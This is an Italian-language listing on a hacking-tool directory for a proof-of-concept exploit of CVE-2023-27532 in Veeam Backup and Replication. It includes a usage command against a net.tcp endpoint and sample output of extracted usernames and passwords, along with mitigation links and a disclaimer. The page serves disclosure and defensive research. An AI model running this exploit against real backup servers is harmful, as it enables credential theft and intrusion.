Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-27532 — POC per Veeam Backup and Replication CVE-2023-27532 | Kitploit
Strumenti/GitHubGitHub/horizon3ai/cve-2023-27532
Analisi delle VulnerabilitàExploitTest di Sicurezza delle APIPenetration TestingRed Teaming
GitHubhorizon3ai/cve-2023-27532

CVE-2023-27532

POC per Veeam Backup and Replication CVE-2023-27532

Vedi Repository
74113 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-27532

POC per CVE-2023-27532 che colpisce Veeam Backup and Replication

Analisi Tecnica

Un'analisi tecnica della causa principale della vulnerabilità è disponibile sul nostro blog: https://www.horizon3.ai/veeam-backup-and-replication-cve-2023-27532-deep-dive

Sommario

Questo POC sfrutta un endpoint API non protetto per estrarre le credenziali.

Utilizzo

root@kitploit:~
/home/dev/RiderProjects/Veeam_CVE-2023-27532/CVE-2023-27532/bin/Debug/net6.0/CVE-2023-27532 net.tcp://192.168.1.139:9401/
UserName = dev Password = Super Secret Password 
UserName = root Password =  
UserName = root Password =  
UserName = root Password =  
UserName = root Password =  

Mitigazioni

Aggiorna all'ultima versione o mitiga seguendo le istruzioni nell'avviso di Veeam

  • https://www.veeam.com/kb4424

Segui l'Horizon3.ai Attack Team su Twitter per le ultime ricerche sulla sicurezza:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

Esclusione di responsabilità

Questo software è stato creato esclusivamente per scopi di ricerca accademica e per lo sviluppo di efficaci tecniche difensive, e non è destinato a essere utilizzato per attaccare sistemi se non esplicitamente autorizzati. I manutentori del progetto non sono responsabili dell'uso improprio del software. Usalo in modo responsabile.

Scarica lo strumento